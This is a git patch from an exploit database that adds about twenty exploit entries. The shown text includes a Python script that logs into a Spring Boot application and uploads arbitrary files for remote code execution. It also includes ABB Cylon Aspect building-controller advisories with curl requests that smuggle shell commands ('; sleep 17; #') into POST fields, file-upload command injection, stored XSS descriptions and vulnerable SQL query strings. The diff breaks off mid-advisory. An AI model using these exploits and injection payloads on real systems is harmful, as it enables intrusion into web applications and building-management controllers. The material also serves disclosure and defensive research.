From b905517ca9a636d1a51cc974fde60ba9812fc8a4 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Wed, 16 Apr 2025 00:16:24 +0000 Subject: [PATCH] DB: 2025-04-16 22 changes to exploits/shellcodes/ghdb Spring Boot common-user-management 0.1 - Remote Code Execution (RCE) ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) - Stored Cross-Site Scripting ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure ABB Cylon Aspect 3.08.03 (CookieDB) - SQL Injection Ivanti Connect Secure 22.7R2.5 - Remote Code Execution (RCE) ABB Cylon Aspect 3.08.03 (MapServicesHandler) - Authenticated Reflected XSS ABB Cylon Aspect 3.08.03 - Hard-coded Secrets Adapt Authoring Tool 0.11.3 - Remote Command Execution (RCE) IBMi Navigator 7.5 - HTTP Security Token Bypass IBMi Navigator 7.5 - Server Side Request Forgery (SSRF) Plane 0.23.1 - Server side request forgery (SSRF) ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS) ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning Cacti 1.2.26 - Remote Code Execution (RCE) (Authenticated) OpenCMS 17.0 - Stored Cross Site Scripting (XSS) Really Simple Security 9.1.1.1 - Authentication Bypass Pymatgen 2024.1 - Remote Code Execution (RCE) --- exploits/java/webapps/52206.py | 96 +++++++++ exploits/multiple/hardware/52214.txt | 85 ++++++++ exploits/multiple/hardware/52215.txt | 115 ++++++++++ exploits/multiple/hardware/52216.txt | 86 ++++++++ exploits/multiple/hardware/52217.txt | 103 +++++++++ exploits/multiple/hardware/52220.txt | 79 +++++++ exploits/multiple/hardware/52221.txt | 86 ++++++++ exploits/multiple/hardware/52224.txt | 79 +++++++ exploits/multiple/remote/52213.py | 138 ++++++++++++ exploits/multiple/webapps/52208.py | 293 +++++++++++++++++++++++++ exploits/multiple/webapps/52210.txt | 114 ++++++++++ exploits/multiple/webapps/52211.txt | 30 +++ exploits/multiple/webapps/52212.txt | 91 ++++++++ exploits/multiple/webapps/52222.txt | 78 +++++++ exploits/multiple/webapps/52223.txt | 90 ++++++++ exploits/php/hardware/52218.txt | 119 ++++++++++ exploits/php/hardware/52219.txt | 100 +++++++++ exploits/php/webapps/52207.py | 124 +++++++++++ exploits/php/webapps/52209.txt | 42 ++++ exploits/php/webapps/52225.txt | 311 +++++++++++++++++++++++++++ exploits/python/remote/52205.py | 53 +++++ files_exploits.csv | 21 ++ 22 files changed, 2333 insertions(+) create mode 100755 exploits/java/webapps/52206.py create mode 100644 exploits/multiple/hardware/52214.txt create mode 100644 exploits/multiple/hardware/52215.txt create mode 100644 exploits/multiple/hardware/52216.txt create mode 100644 exploits/multiple/hardware/52217.txt create mode 100644 exploits/multiple/hardware/52220.txt create mode 100644 exploits/multiple/hardware/52221.txt create mode 100644 exploits/multiple/hardware/52224.txt create mode 100755 exploits/multiple/remote/52213.py create mode 100755 exploits/multiple/webapps/52208.py create mode 100644 exploits/multiple/webapps/52210.txt create mode 100644 exploits/multiple/webapps/52211.txt create mode 100644 exploits/multiple/webapps/52212.txt create mode 100644 exploits/multiple/webapps/52222.txt create mode 100644 exploits/multiple/webapps/52223.txt create mode 100644 exploits/php/hardware/52218.txt create mode 100644 exploits/php/hardware/52219.txt create mode 100755 exploits/php/webapps/52207.py create mode 100644 exploits/php/webapps/52209.txt create mode 100644 exploits/php/webapps/52225.txt create mode 100755 exploits/python/remote/52205.py diff --git a/exploits/java/webapps/52206.py b/exploits/java/webapps/52206.py new file mode 100755 index 000000000..974720716 --- /dev/null +++ b/exploits/java/webapps/52206.py @@ -0,0 +1,96 @@ +# Exploit Title: Unrestricted File Upload +# Google Dork: +# Date: 14/Nov/2024 +# Exploit Author: d3sca +# Vendor Homepage: +https://github.com/OsamaTaher/Java-springboot-codebase +# Software Link: +https://github.com/OsamaTaher/Java-springboot-codebase +# Version: [app version] 0.1 +# Tested on: Debian Linux +# CVE : CVE-2024-52302 + + +# Steps to Reproduce: + +# Upload Malicious File: Send a PUT request to /api/v1/customer/profile-picture using customer with role 26,17 added with a malicious file payload (e.g., .jsp, .php, .html). + +# GET the file location: Send GET request /api/v1/customer/my-profile , grap the file location in response with the profile's link. + +# Execute the Uploaded File: Using the file name access the file directly through the URL returned in the response. +# If the server supports the uploaded file type, it will execute the file, leading to Remote Code Execution. + + +import requests +import argparse +import sys + + +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +def login(url, username, password): + """Authenticate with the API and return the Bearer token.""" + login_endpoint = f"{url}/api/v1/user/login" + headers = {"Content-Type": "application/json"} + payload = { + "username": username, + "password": password + } + + try: + response = requests.post(login_endpoint, json=payload, headers=headers, verify=False) + response.raise_for_status() + + # Extract token + token = response.json().get("token") + if not token: + print("[!] Token not found in response. Exiting.") + sys.exit(1) + + print("[+] Authentication successful. Token acquired.") + return token + except Exception as e: + print(f"[!] Login failed: {e}") + sys.exit(1) + +def upload_file(url, token, file_path): + """Upload a file to the profile picture endpoint using the Bearer token.""" + upload_endpoint = f"{url}/api/v1/customer/profile-picture" + headers = { + "Authorization": f"Bearer {token}" + } + files = { + "file": open(file_path, "rb") + } + + try: + response = requests.post(upload_endpoint, headers=headers, files=files, verify=False) + response.raise_for_status() + + if response.status_code == 200: + print("[+] File uploaded successfully.") + print(f"[+] Response: {response.text}") + else: + print(f"[!] Failed to upload file. Status code: {response.status_code}") + print(f"[!] Response: {response.text}") + except Exception as e: + print(f"[!] File upload failed: {e}") + sys.exit(1) + +def main(): + parser = argparse.ArgumentParser(description="Exploit script for unrestricted file upload vulnerability.") + parser.add_argument("-u", "--username", required=True, help="Username for login") + parser.add_argument("-p", "--password", required=True, help="Password for login") + parser.add_argument("-f", "--file", required=True, help="File to upload") + parser.add_argument("-url", "--url", required=True, help="Base URL of the target application (e.g., https://target.com)") + + args = parser.parse_args() + + # Authenticate + token = login(args.url, args.username, args.password) + + # Upload the file + upload_file(args.url, token, args.file) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/hardware/52214.txt b/exploits/multiple/hardware/52214.txt new file mode 100644 index 000000000..736245ffc --- /dev/null +++ b/exploits/multiple/hardware/52214.txt @@ -0,0 +1,85 @@ +ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) Stored Cross-Site Scripting +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.02 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: The ABB BMS/BAS controller suffers from an authenticated stored cross-site +scripting vulnerability. Input passed to the 'host' POST parameter is not +properly sanitised before being returned to the user. This can be exploited +to execute arbitrary HTML/JS code in a user's browser session in context of +an affected site. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5906 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5906.php +CVE ID: CVE-2024-6516 +CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516 + + +21.04.2024 + +--> + + + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + + +
+ + + +
+ + \ No newline at end of file diff --git a/exploits/multiple/hardware/52215.txt b/exploits/multiple/hardware/52215.txt new file mode 100644 index 000000000..1cf441d65 --- /dev/null +++ b/exploits/multiple/hardware/52215.txt @@ -0,0 +1,115 @@ +ABB Cylon Aspect 3.08.02 (licenseUpload.php) Stored Cross-Site Scripting +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.02 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated +stored cross-site scripting (XSS) vulnerability. This can be exploited by +uploading a malicious .txt file containing an XSS payload, which is stored +on the server and served back to users. Although the filename is sanitized +via the filename POST parameter, the file contents are not inspected or +sanitized, allowing attackers to inject arbitrary client-side scripts that +execute in the context of any user accessing the infected file or related +web page (license.php). To bypass file upload checks, the request must include +the Variant string enabling the upload process for potential exploitation. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5905 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5905.php +CVE ID: CVE-2024-6516 +CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516 + + +21.04.2024 + +--> + + + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + + + + +
+ +
+ + \ No newline at end of file diff --git a/exploits/multiple/hardware/52216.txt b/exploits/multiple/hardware/52216.txt new file mode 100644 index 000000000..e573b7cc0 --- /dev/null +++ b/exploits/multiple/hardware/52216.txt @@ -0,0 +1,86 @@ +ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution + + +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.02 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated +OS command injection vulnerability. This can be exploited to inject and execute +arbitrary shell commands through the contents of an uploaded .db file, which +is passed to the copyFile.sh script. Although the filename is sanitized, the +contents of the .db file are not, allowing attackers to inject malicious commands +that are executed on the server. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5904 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5904.php +CVE ID: CVE-2024-48839 +CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839 + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ curl -s http://192.168.73.31/uploadDb.php \ +> -H "Cookie: PHPSESSID=xxx" \ +> -F "userfile=@testingus.db" + +$ curl http://192.168.73.31/database/testingus.db \ No newline at end of file diff --git a/exploits/multiple/hardware/52217.txt b/exploits/multiple/hardware/52217.txt new file mode 100644 index 000000000..f437cae3f --- /dev/null +++ b/exploits/multiple/hardware/52217.txt @@ -0,0 +1,103 @@ +ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.02 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated +blind command injection vulnerability. Input passed to several POST parameters +is not properly sanitized when writing files, allowing attackers to execute +arbitrary shell commands on the system. There is also an off-by-one error in +array access that could lead to undefined behavior and potential DoS. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5903 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5903.php +CVE ID: CVE-2024-48839, CVE-2024-6516, CVE-2024-51550 +CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839 + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ curl http://192.168.73.31/bbmdUpdate.php \ +> -H "Cookie: PHPSESSID=xxx" \ +> -d "rowCount=2&\ +> ip1=192.168.1.1&\ +> port1=47808&\ +> hexMask1=0xFFFF&\ +> remove1=0&\ +> ip2=192.168.1.2&\ +> port2=47809&\ +> hexMask2=0xFFFF; sleep 17; #&\ +> remove2=0&\ +> submit=Submit + +$ curl http://192.168.73.31/bbmdUpdate.php \ +> -H "Cookie: PHPSESSID=xxx" \ +> -d "rowCountNAT=2&\ +> NATip1=192.168.1.1&\ +> NATport1=2222&\ +> NAThexMask1=0xFFFF&\ +> NATremove1=7&\ +> NATip2=192.168.1.2&\ +> NATport2=2223&\ +> NAThexMask2=0xFFFF; sleep 17; #&\ +> NATremove2=0&\ +> submit=Submit \ No newline at end of file diff --git a/exploits/multiple/hardware/52220.txt b/exploits/multiple/hardware/52220.txt new file mode 100644 index 000000000..5e1839c70 --- /dev/null +++ b/exploits/multiple/hardware/52220.txt @@ -0,0 +1,79 @@ +ABB Cylon Aspect 3.08.03 (CookieDB) SQL Injection +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.03 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: The ABB BMS/BAS controller suffers from an SQL injection through the +key and user parameters. These inputs are not properly sanitized and do not +utilize stored procedures, allowing attackers to manipulate SQL queries and +potentially gain unauthorized access to the database or execute arbitrary SQL +commands. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5900 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5900.php + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ ./sqli.py -2 CookieDb.java +removeUserCookie() -> DELETE FROM Cookies WHERE Key=\"" + key + "\"" + " AND " + "User" + "=\"" + user + "\""; +getAllUserCookies() -> SELECT * FROM Cookies WHERE User=\"" + user + "\""; \ No newline at end of file diff --git a/exploits/multiple/hardware/52221.txt b/exploits/multiple/hardware/52221.txt new file mode 100644 index 000000000..f64968c60 --- /dev/null +++ b/exploits/multiple/hardware/52221.txt @@ -0,0 +1,86 @@ +ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.07.02 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: The ABB BMS/BAS controller suffers from a weak password policy, allowing +users to set overly simplistic or blank passwords and usernames without restrictions. +This vulnerability significantly reduces account security, enabling attackers +to exploit weak credentials for unauthorized access to the system. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2024-5898 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5898.php +CVE ID: CVE-2024-48845 +CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48845 + + +21.04.2024 + 